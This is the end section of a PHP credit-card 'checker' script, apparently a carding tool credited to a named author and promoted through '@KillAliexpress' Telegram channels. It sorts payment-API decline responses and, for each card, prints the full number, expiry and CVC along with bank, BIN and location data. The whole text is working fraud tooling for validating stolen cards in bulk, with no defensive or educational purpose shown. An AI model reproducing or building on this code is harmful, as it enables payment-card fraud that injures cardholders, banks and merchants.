'.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "fail"')){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = CVC Check Failed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,"parameter_invalid_empty")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Parameter Invalid Empty </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,"lock_timeout")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Lock Timeout </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,'Your card does not support this type of purchase.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your card does not support this type of purchase </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,"transaction_not_allowed")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Transaction Not Allowed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,"three_d_secure_redirect")){
     echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Three D Secure Redirect </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, 'Card is declined by your bank, please contact them for additional information.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Card is declined by your bank, please contact them for additional information </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,"missing_payment_information")){
     echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Missing Payment Information </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "Payment cannot be processed, missing credit card number")) {
     echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Payment cannot be processed, missing credit card number </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
else {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Error Not Listed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
curl_close($ch);
ob_flush();
//echo $result;
/////////////////========== 2 req Proxyless RAW API Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁 ™】 ===========//////////////////
////////////////============== Join @KillAliexpress & @KillAliexpressChat for more ==============///////////////////////
?>